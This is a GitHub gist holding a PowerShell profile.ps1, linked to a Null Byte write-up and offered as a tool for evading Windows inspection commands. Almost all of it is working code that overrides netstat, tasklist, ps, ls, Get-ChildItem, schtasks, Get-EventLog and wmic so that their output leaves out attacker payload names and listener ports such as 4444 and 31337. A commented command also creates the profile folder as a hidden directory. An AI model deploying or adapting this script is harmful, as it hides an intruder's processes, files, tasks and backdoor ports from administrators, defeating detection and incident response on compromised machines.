Created
August 26, 2020 23:09
-
-
Save tokyoneon/c8d6abe86fc4e64a4b7015bfe97b8d32 to your computer and use it in GitHub Desktop.
PowerShell profile.ps1 for evading Netstat, Tasklist, Get-EventLog, Schtasks, etc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # write-up: https://null-byte.com/powershell-evasion-0329395/ | |
| # create the profile.ps1 directory if it doesn't exist | |
| # cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden" | |
| # processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1 | |
| $excludeFiles = "payload|evil|tokyoneon" | |
| # listening ports and PIDs to exclude | |
| $excludePorts = "4444|1337|31337|55555" | |
| function netstat { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
| function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
| function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" | Select-String -notmatch "$excludeFiles" } | |
| function ps { powershell.exe -NoProfile -c "ps $args" | Select-String -notmatch "$excludeFiles" } | |
| function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
| function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
| function ls { powershell.exe -NoProfile -c "ls $args" | Select-String -notmatch "$excludeFiles" } | |
| function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" | Select-String -notmatch "$excludeFiles" } | |
| function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
| function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
| function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" | Select-String -notmatch "$excludeFiles|$excludePorts" } | |
| function wmic { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } | |
| function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment